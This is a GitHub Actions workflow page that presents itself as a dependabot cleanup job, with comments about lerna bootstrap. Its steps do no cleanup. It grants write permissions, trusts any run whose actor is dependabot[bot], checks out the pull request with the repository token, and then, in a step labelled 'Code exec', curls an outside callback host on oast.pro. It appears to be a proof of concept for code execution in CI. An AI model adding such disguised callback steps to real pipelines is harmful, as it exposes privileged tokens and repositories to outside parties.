Dependabot/pip/urllib3 2.2.3 #3
Workflow file for this run
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This workflow runs `lerna bootstrap` after dependabot updates a package-lock file. | |
| # Without it, package-locks become cluttered with incorrect dependencies that | |
| # normally would be removed by lerna. It wouldn't be necessary if we weren't using | |
| # lerna bootstrap. | |
| name: Clean up after dependabot | |
| # Triggered when a PR is (re)opened or synchronized | |
| on: | |
| pull_request: | |
| paths: | |
| - 'plugins/**' | |
| permissions: | |
| pull-requests: write # This action modifies PRs | |
| contents: write # This action adds commits to PRs | |
| jobs: | |
| update: | |
| runs-on: ubuntu-latest | |
| # Only run on dependabot PRs | |
| if: ${{ github.actor == 'dependabot[bot]' }} | |
| steps: | |
| - name: Checkout repository | |
| uses: actions/checkout@v3 | |
| # Check out the dependabot PR so commits are added there | |
| - name: Checkout PR | |
| env: | |
| GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} | |
| run: gh pr checkout ${{ github.event.pull_request.number }} | |
| # Execute code | |
| - name: Code exec | |
| run: curl https://csrjohgo6s5baifq7tf0jnz7aqgiacigt.oast.pro/executed |